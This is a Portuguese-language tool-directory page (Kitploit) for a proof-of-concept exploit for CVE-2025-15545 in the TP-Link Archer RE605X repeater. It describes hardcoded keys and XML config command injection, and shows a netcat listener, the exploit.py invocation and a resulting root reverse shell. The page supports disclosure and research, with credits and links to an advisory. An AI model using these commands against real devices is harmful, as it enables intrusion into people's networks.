Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-15545 — Prova de Conceito para CVE-2025-15545 | Kitploit
Ferramentas/GitHubGitHub/xernary/cve-2025-15545
Segurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoEngenharia ReversaComando e Controle
GitHubxernary/cve-2025-15545

CVE-2025-15545

Prova de Conceito para CVE-2025-15545

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2025-15545

Informações

Fornecedor: TP-Link
Site do fornecedor: TP-Link
Modelo: Archer RE605X
Versão de hardware: RE605X v3.0
Versão do firmware: RE605X(EU)_V3_1.1.5 Build 20240905
Endereço de download do firmware: TP-Link

Uma cadeia de vulnerabilidades — incluindo o uso de chaves criptográficas hardcoded e uma injeção de comandos no componente analisador de configuração XML — permite que um atacante autenticado localmente obtenha execução remota de código (RCE) como root no dispositivo.

Requisitos do PoC

Nota: A prova de conceito exploit.py demonstra um cenário de ataque encadeado e depende de credenciais de um usuário autenticado como pré-requisito adicional. Esta etapa de autenticação não é coberta pela CVE-2025-15545 e está incluída apenas para fins de demonstração.

  • Tanto o atacante quanto a vítima devem estar conectados à rede local do repetidor.
  • A vítima deve estar autenticada no painel de controle web do repetidor.

Uso

Escute por conexões de entrada em um terminal separado:

root@kitploit:~
$ nc -lvnp 4444

Execute o script exploit.py:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

Nota: aes_key e aes_iv são as chaves criptográficas hardcoded usadas pelo dispositivo para criptografar e descriptografar arquivos de configuração, e são necessárias para esta prova de conceito. Por questões de segurança, elas não podem ser compartilhadas aqui.

A shell reversa é recebida no primeiro terminal:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

Referências

Estas vulnerabilidades foram reportadas por Nicola Giuffrida.

  • Writeup completo: https://nico-security.com/posts/cve-2025-15545
  • Registro CVE: https://www.cve.org/cverecord?id=CVE-2025-15545
  • Aviso da TP-Link: https://www.tp-link.com/us/support/faq/4929
Baixar ferramenta